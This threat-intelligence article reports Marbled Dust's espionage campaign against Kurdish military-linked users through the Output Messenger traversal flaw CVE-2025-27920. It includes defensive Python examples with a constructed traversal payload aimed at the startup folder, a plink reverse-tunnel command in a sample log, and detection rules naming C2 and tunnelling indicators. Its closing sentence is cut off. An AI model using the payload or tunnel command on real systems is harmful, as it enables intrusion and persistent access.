Marbled Dust’s Cyber Espionage Escalates with Output Messenger Zero-Day Exploit

A New Phase in Middle East Cyber Warfare Uncovered

Microsoft Threat Intelligence reports that Marbled Dust, a Türkiye-affiliated cyber espionage group, has been exploiting a zero-day vulnerability in the Output Messenger enterprise messaging platform against users associated with the Kurdish military in Iraq. The campaign has been active since April 2024, and its use of a previously unknown flaw marks a step up in both capability and urgency for Marbled Dust. The objectives are data theft, user impersonation, and long-term access to the compromised environment.

The campaign hinges on CVE-2025-27920, a directory traversal vulnerability in Output Messenger Server Manager that lets an authenticated user upload files outside the intended upload directory, including into the server's startup directory, where they execute on the next restart and give the attacker persistent control. The app's developer, Srimax, has released a patched version; Microsoft disclosed the issue and published detection guidance. Organizations that have not updated remain at significant risk.

Microsoft assesses that Marbled Dust overlaps with activity tracked by other vendors as Sea Turtle and UNC1326, groups known for espionage against governments, IT providers, and telecom operators across Europe and the Middle East. In this campaign Marbled Dust combines the zero-day with its established tradecraft of DNS hijacking and credential theft to extend its reach.

Below, we break down the campaign’s progression, technical details, and implications—and analyze what it all means for the future of regional cyber warfare.

Digest of Key Developments and Technical Findings

Threat Actor Identified: Marbled Dust, a Türkiye-affiliated espionage group, is behind the campaign.
Primary Target: Kurdish military-related individuals and institutions in Iraq using Output Messenger.
Zero-Day Vulnerability: CVE-2025-27920 allows an authenticated attacker to upload files into the server's startup folder via directory traversal.
Secondary Vulnerability Identified: CVE-2025-27921 was also found and patched, but has not been observed being exploited.
Data Exfiltration Confirmed: Microsoft observed Marbled Dust collecting data and sending it to hardcoded C2 domains.
Technical Sophistication: The attackers deploy a Go-based backdoor (OMServerService.exe) that is statically compiled and easy to cross-compile, so the same codebase runs across the target's Windows versions without runtime dependencies.

Attack Chain Breakdown:

Initial access via intercepted Output Messenger credentials.

Exploitation of the Output Messenger zero-day (CVE-2025-27920) to write files into the server's startup folder.

Delivery of multiple malicious files to the server and to clients.

Persistent backdoor installation that survives restarts.

Exfiltration through C2 communication, with tunneling tools such as plink used alongside it.

Credential Theft Techniques: DNS hijacking and typo-squatting.

Targeted Software Architecture: Attack leverages client-server nature of Output Messenger for broader compromise.

Mitigation and Response:

Patched Output Messenger builds released by Srimax following Microsoft's disclosure.

Defender XDR alerts and hunting guidance published by Microsoft.

Security Copilot support deployed.

Systemic Risk: Attack exposes organizations to full chat surveillance, identity theft, and internal system infiltration.
Lateral Movement Potential: Attackers can impersonate users and disrupt communications organization-wide.

Security Recommendations:

Immediate patching of Output Messenger.

Full automation of detection and remediation through Defender XDR.

Implementation of attack surface reduction rules.

Hunting and Detection Tools: Microsoft provides hunting queries to search for the malicious files, processes, and network connections associated with the campaign.
Broader Trend: Increased activity by state-linked groups in espionage and infrastructure compromise across the Middle East.
Overlap with Other Threat Actors: Sea Turtle and UNC1326 share operational traits with Marbled Dust.
C2 Infrastructure: Malicious communication is funneled through api.wordinfos[.]com and related IPs.
File Sharing Exploited: Output Messenger's file upload feature becomes the vector for malicious payload delivery.
Persistence Mechanisms: A startup script, OMServerService.vbs, dropped into the startup folder ensures the backdoor is relaunched after every restart.
Go Advantage: Static, cross-compiled binaries run on any supported Windows version without extra runtime components, making Go well suited to sustained backdoor operations.
Real-World Impact: On one victim device, sensitive files were collected into a RAR archive for exfiltration.
Microsoft's Broader Threat Landscape: Other state actors (e.g., Secret Blizzard) are also active across Asia and Europe.
Cyber Escalation Evidence: The sophistication of the attack signals higher stakes in Marbled Dust's operations.

What Undercode Say:

This operation is a textbook example of how modern nation-state cyber actors evolve to maintain an edge in the digital espionage race. Marbled Dust’s exploitation of CVE-2025-27920 reflects both technical advancement and strategic alignment with Türkiye’s geopolitical interests in the Middle East.

The vulnerability’s nature—a directory traversal flaw in Output Messenger’s Server Manager—speaks volumes about the risks of insufficient input validation in enterprise messaging platforms. That Marbled Dust successfully weaponized this issue to deliver persistent backdoors demonstrates a deep understanding of both the software and the operational habits of their targets.
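The traversal flaw described above and in the campaign summary (an authenticated user supplying a file name that walks out of the upload directory into the startup folder) is easy to reproduce in miniature. The following is an added illustration written for this article, not Output Messenger's source code: the paths, the `UPLOAD_ROOT`/`STARTUP_DIR` layout, and the function names are assumptions. It shows a naive upload handler beside a hardened one that strips directory components and proves containment before writing.

```python
"""Illustrative path-traversal upload bug and its fix (added example, not
Srimax's code). Server layout below is hypothetical."""

import posixpath
from pathlib import PurePosixPath

# Assumed server layout; real servers run on Windows and the startup
# folder is the per-machine Start Menu\Programs\StartUp directory.
UPLOAD_ROOT = "/srv/outputmessenger/uploads"
STARTUP_DIR = "/srv/outputmessenger/startup"


class TraversalError(ValueError):
    """Raised when a client-supplied name would escape UPLOAD_ROOT."""


def vulnerable_target(filename: str) -> str:
    """Destination path the way a naive handler builds it.

    The client-controlled name is joined to the root with no validation,
    so '../' components walk out of UPLOAD_ROOT. This mirrors the bug
    class behind CVE-2025-27920; it does not reproduce the real code.
    """
    return posixpath.normpath(posixpath.join(UPLOAD_ROOT, filename))


def hardened_target(filename: str) -> str:
    """Destination path with traversal defences applied.

    1. Treat backslashes as separators too (Windows accepts both).
    2. Keep only the final path component.
    3. Reject empty, dot-only and NUL-containing names.
    4. Re-check containment after normalisation (defence in depth).
    """
    name = filename.replace("\\", "/")
    base = PurePosixPath(name).name  # drops every directory component
    if base in ("", ".", "..") or "\x00" in base:
        raise TraversalError(f"rejected upload name: {filename!r}")
    dest = posixpath.normpath(posixpath.join(UPLOAD_ROOT, base))
    if posixpath.commonpath([UPLOAD_ROOT, dest]) != UPLOAD_ROOT:
        raise TraversalError(f"path escapes upload root: {dest}")
    return dest


def lands_in_startup(path: str) -> bool:
    """True if a write to `path` would land in the autostart directory."""
    return posixpath.commonpath([STARTUP_DIR, path]) == STARTUP_DIR


def is_rejected(filename: str) -> bool:
    """True if the hardened handler refuses `filename`."""
    try:
        hardened_target(filename)
    except TraversalError:
        return True
    return False


if __name__ == "__main__":
    # Constructed attacker input: climbs out of uploads/ into startup/.
    payload = "../startup/OMServerService.vbs"
    print("vulnerable ->", vulnerable_target(payload),
          "(startup:", lands_in_startup(vulnerable_target(payload)), ")")
    print("hardened   ->", hardened_target(payload))
    print("rejects '..':", is_rejected(".."))
```

The hardened version deliberately does two things that each suffice on their own: it discards every directory component, and it still verifies that the normalised result shares `UPLOAD_ROOT` as its common prefix. Relying on a single string check (for example, refusing names containing `..`) is the mistake that traversal bugs of this class usually come from, since encoded or mixed-separator variants slip past it.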

The choice of Go for the malware is significant. Go produces statically linked native binaries and cross-compiles trivially, so one codebase can be built for every Windows version in the target environment without depending on runtime components that might be missing or monitored. That reduces maintenance for the attackers and the chance of a failed deployment, and it reflects a deliberate shift toward cross-platform persistence that is a hallmark of advanced persistent threat (APT) actors.

Marbled Dust’s method of gaining initial authentication remains opaque, but strong suspicion of DNS hijacking and typo-squatted domains suggests extensive infrastructure support. These tactics are not just opportunistic—they are well-funded, sustained, and optimized for high-value espionage.

More critically, the impact of compromising Output Messenger reaches far beyond initial data theft. By controlling the messaging server, attackers can surveil internal communications, impersonate users, intercept file transfers, and orchestrate internal chaos. This can paralyze both military and administrative operations within sensitive institutions.

Moreover, the targeting of Kurdish military personnel aligns with Türkiye’s regional strategic objectives. This campaign could be part of a broader effort to monitor, destabilize, or influence Kurdish defense capabilities through digital means.

While Microsoft has responded swiftly, working with Srimax on a fix and publishing hunting queries and detections, the effectiveness of these measures depends entirely on organizational response. Failure to update systems and to hunt for the known artifacts leaves institutions critically vulnerable, especially in conflict zones where intelligence is currency.
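The indicators the article lists (a .vbs dropped into the startup folder, a process named OMServerService.exe, DNS resolution of api.wordinfos[.]com, and plink appearing on the host) are concrete enough to hunt for. The following is an added example written for this article, not Microsoft's published hunting queries and not Srimax's code: it runs simple rules over a few constructed, Sysmon-style telemetry lines. The log format, the benign process names and the `OMServerHost.exe` name used for the legitimate server process are assumptions; only the indicator names come from the article.

```python
"""Hunt for the Marbled Dust / Output Messenger artifacts named in the
article over constructed endpoint telemetry (added example)."""

from collections import Counter

# Indicators from the article; everything else in this file is constructed.
KNOWN_C2_DOMAINS = {"api.wordinfos.com"}
KNOWN_ARTIFACT_NAMES = {"omserverservice.exe", "omserverservice.vbs"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
TUNNEL_TOOLS = {"plink.exe"}
AUTOSTART_EXT = (".vbs", ".exe", ".bat", ".cmd", ".ps1", ".js")
STARTUP_MARKER = "\\start menu\\programs\\startup\\"

# Constructed telemetry, one event per line: ts|type|key=value,key=value
# (OMServerHost.exe is a hypothetical name for the legitimate server process.)
SUSPICIOUS_LOG = [
    r"2025-04-10T09:12:03Z|FileCreate|image=C:\Program Files\OMServer\OMServerHost.exe,target=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\OMServerService.vbs",
    r'2025-04-10T09:12:05Z|ProcessCreate|image=C:\Windows\System32\wscript.exe,parent=C:\Windows\explorer.exe,cmdline="C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\OMServerService.vbs"',
    r"2025-04-10T09:12:06Z|ProcessCreate|image=C:\Users\Public\OMServerService.exe,parent=C:\Windows\System32\wscript.exe,cmdline=OMServerService.exe",
    r"2025-04-10T09:12:07Z|DnsQuery|image=C:\Users\Public\OMServerService.exe,query=api.wordinfos.com",
    r"2025-04-10T09:30:00Z|ProcessCreate|image=C:\Users\Public\plink.exe,parent=C:\Users\Public\OMServerService.exe,cmdline=plink.exe -N -R 2222:localhost:22 svc@remote",
]
BENIGN_LOG = [
    r"2025-04-10T10:00:00Z|DnsQuery|image=C:\Program Files\OMServer\OMServerHost.exe,query=updates.example.com",
    r"2025-04-10T10:01:00Z|ProcessCreate|image=C:\Windows\System32\notepad.exe,parent=C:\Windows\explorer.exe,cmdline=notepad.exe",
    r"2025-04-10T10:02:00Z|FileCreate|image=C:\Windows\explorer.exe,target=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\OneNote.lnk",
]
SAMPLE_LOG = SUSPICIOUS_LOG + BENIGN_LOG


def parse_event(line: str) -> dict:
    """Split one telemetry line into a flat dict of fields."""
    ts, kind, rest = line.split("|", 2)
    fields = dict(kv.split("=", 1) for kv in rest.split(","))
    fields.update(ts=ts, type=kind)
    return fields


def basename(path: str) -> str:
    """Lower-cased final component of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev: dict) -> list:
    """Return the names of every hunting rule the event matches."""
    hits = []
    image = basename(ev.get("image", ""))
    target = ev.get("target", "")
    cmd = ev.get("cmdline", "").lower()
    # 1. Script or executable written into the machine-wide startup folder.
    if (ev["type"] == "FileCreate" and STARTUP_MARKER in target.lower()
            and target.lower().endswith(AUTOSTART_EXT)):
        hits.append("startup_drop")
    # 2. A script host launching something from the startup folder.
    if ev["type"] == "ProcessCreate" and image in SCRIPT_HOSTS and "\\startup\\" in cmd:
        hits.append("startup_script_exec")
    # 3. Resolution of the C2 domain named in the article.
    if ev["type"] == "DnsQuery" and ev.get("query", "").lower().rstrip(".") in KNOWN_C2_DOMAINS:
        hits.append("known_c2_dns")
    # 4. SSH tunnelling tool execution (plink).
    if ev["type"] == "ProcessCreate" and image in TUNNEL_TOOLS:
        hits.append("tunneling_tool")
    # 5. Any field mentioning the backdoor or its startup script by name.
    names = {image, basename(target), basename(ev.get("parent", ""))}
    if names & KNOWN_ARTIFACT_NAMES or any(n in cmd for n in KNOWN_ARTIFACT_NAMES):
        hits.append("known_artifact_name")
    return hits


def hunt(lines) -> list:
    """Run every rule over every line; one finding per (event, rule) pair."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        for rule in evaluate(ev):
            findings.append({"rule": rule, "ts": ev["ts"], "type": ev["type"],
                             "image": ev.get("image", "")})
    return findings


def summarize(findings) -> dict:
    """Count findings per rule name."""
    return dict(Counter(f["rule"] for f in findings))


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f["ts"], f["rule"], f["image"])
    print(summarize(hunt(SAMPLE_LOG)))
```

Rules 1, 2 and 4 are behavioural and will keep firing after the attackers rename their binaries; rules 3 and 5 are pure indicator matches and should be treated as confirmations rather than the only trigger. The `.lnk` in the benign set is there on purpose: shortcuts in the startup folder are common, so the drop rule is limited to script and executable extensions.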

This campaign also reflects a broader trend: state-sponsored, purpose-driven espionage now sits alongside traditional cybercrime as a dominant threat, and the two increasingly share tooling. Legitimate utilities such as plink and RAR, long favored by criminal groups for tunneling and staging, are repurposed here for intelligence collection against a military target.

Furthermore, this is not an isolated incident. Marbled Dust has been linked to previous operations involving DNS manipulation and credential theft across Europe and the Middle East. Their track record underscores the need for proactive threat hunting, not just reactive patching.

Organizations should treat this as a wake-up call to rethink their software vetting, network segmentation, and user authentication protocols. Messaging apps, often treated as benign internal tools

References:

Reported By: www.microsoft.com